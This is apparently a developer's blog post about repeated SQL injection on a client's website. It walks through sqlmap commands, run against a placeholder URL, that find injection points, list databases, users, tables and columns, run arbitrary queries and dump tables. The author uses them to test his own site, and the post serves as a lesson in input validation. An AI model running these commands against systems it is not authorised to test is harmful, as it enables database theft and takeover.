Website injection vulnerabilities are surely well known to the vast majority of web developers. Yet after six or seven years of development work I did not expect to be caught out by one, and it is depressing. My mood is a tangle; as my wife puts it, I act like someone in love.
It started a few months ago, when an important customer's website was injected. There was no loss at the time: only varchar or text fields longer than 100 characters were affected, and a piece of HTML had been inserted into them, so the content was not maliciously damaged; it just looked like an advertisement.
I did not think much of it then; I simply checked every table and cleaned them up.
A few weeks later, to my surprise, the database was injected again. This time I was alert: I went through most of the code in detail and scanned the site with an expensive HP scanner, and I did find one file with a potential injection risk. I cleaned up the code and fixed the problem.
After a few more weeks the database was injected yet again, which made me very angry. I ran the HP scanner again and it found nothing; I scanned the server with various security tools and found nothing either. It was genuinely confusing, and in the end all I could do was clean the data again.
From then on it became a tug of war: every few weeks it was injected and I cleaned it up, and a few weeks later it was injected again. I ended up logging in from time to time just to check whether it had happened once more.
Eventually I noticed a pattern: only character-type fields longer than 100 characters, and only in tables under the dbo schema, were being infected.
That was a clue, though I brushed it aside at the time.
Then this afternoon, checking again, I happened upon a strange table name: dbo.pangolin_test_table. All my tables are named in camel case; only a few use underscores. I knew I had not created this one, and when I searched the name on Google I could have cried.
That is how I came across sqlmap, whose official website carries the slogan "automatic SQL injection and database takeover tool" (I think "takeover tool" sounds even more domineering when translated literally).
This time I intended to get to the bottom of the problem, so I went to the website and looked things up.
The current version of sqlmap is 1.0; its address is https://github.com/sqlmapproject/sqlmap
sqlmap is written in Python, so you need to install the Python runtime locally, from http://www.python.org/download/
Note that sqlmap is particular about the Python version: it only works with 2.6 or 2.7, and neither a higher nor a lower version can be used.
After installing Python, go to the directory where sqlmap was unpacked and run the following tests. Detailed usage of sqlmap is something I intend to write up in another article; this is just a quick verification.
1. sqlmap.py -u "http://www.xxx.com/?year=2012&month=06" -v 0 starts an injection test against the site using that page. Since I was testing my own website, I already knew the OS and database, and specifying them directly speeds up the check:
sqlmap.py -u "http://www.xxx.com/?year=2012&month=06" --dbms "Microsoft SQL Server" --os "Windows" -v 0
The prompt that appears means that several injection points were detected; choose one to test, or enter q to quit.
2. After choosing one and waiting, the output that appears lists the basic server information.
3. Continue with the following command (--dbs lists all databases on the server): sqlmap.py -u "http://www.xxx.com/?year=2012&month=06" --dbs
That already scared me a little. It's absurd.
4. Continue with the next command (--users lists all users): sqlmap.py -u "http://www.xxx.com/?year=2012&month=06" --users
Well, that one is tolerable: it can only list the default login name used in the current web.config connection string.
5. Continue with the next command (--passwords lists all users' passwords): sqlmap.py -u "http://www.xxx.com/?year=2012&month=06" --passwords
Before running it I shuddered a few times. Had this worked, I would have been truly depressed. Fortunately it got nothing, because I had enforced strong password rules.
6. Run the command (--tables lists all table names; -D dbname selects a specific database): sqlmap.py -u "http://www.xxx.com/?year=2012&month=06" --tables -D dbname
By now I was about to wet myself.
7. Run the command (--columns lists the columns; -T tablename selects the table): sqlmap.py -u "http://www.xxx.com/?year=2012&month=06" --columns -T tablename -D dbname
Good grief, why bother with a database manager at all; just use this.
8. Run the command: sqlmap.py -u "http://www.xxx.com/?year=2012&month=06" -v 1 --sql-query "select top 20 * from City"
It can even run arbitrary queries; I am speechless at the thought of an update.
9. Run the command: sqlmap.py -u "http://www.xxx.com/?year=2012&month=06" -v 1 -T tablename -D dbname --dump
Anything else you might want to do is just as easy.
After running through this whole sequence I could not help feeling a chill. I had thought I was careful about this: strict validation of integer strings, regular expressions for email addresses and mobile numbers, and parameterized statements. For various reasons that was not applied everywhere, and the actual target page was one I had been too busy for, so another colleague wrote it.
I did not expect that one small page to be overlooked.
Take precautions, always.
I used to think of myself as a programmer and engineer; now I find I have to put the words "advertising company" in front of that title.